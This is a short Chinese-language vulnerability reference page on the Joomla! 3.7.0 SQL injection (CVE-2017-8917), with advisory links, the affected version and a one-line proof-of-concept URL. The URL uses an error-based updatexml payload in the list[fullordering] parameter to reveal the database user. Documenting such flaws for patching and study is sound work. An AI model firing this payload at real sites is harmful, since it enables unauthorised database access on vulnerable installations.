跳转至

Joomla! 3.7.0 SQL注入(CVE-2017-8917)

Official

https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917

Affected Version

Joomla! 3.7.0

PoC

直接访问,爆出数据库用户名:

http://foo.com/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

References

  1. http://blog.nsfocus.net/joomla-3-7-0-sql-injection-vulnerability/

最后更新: 2021-03-24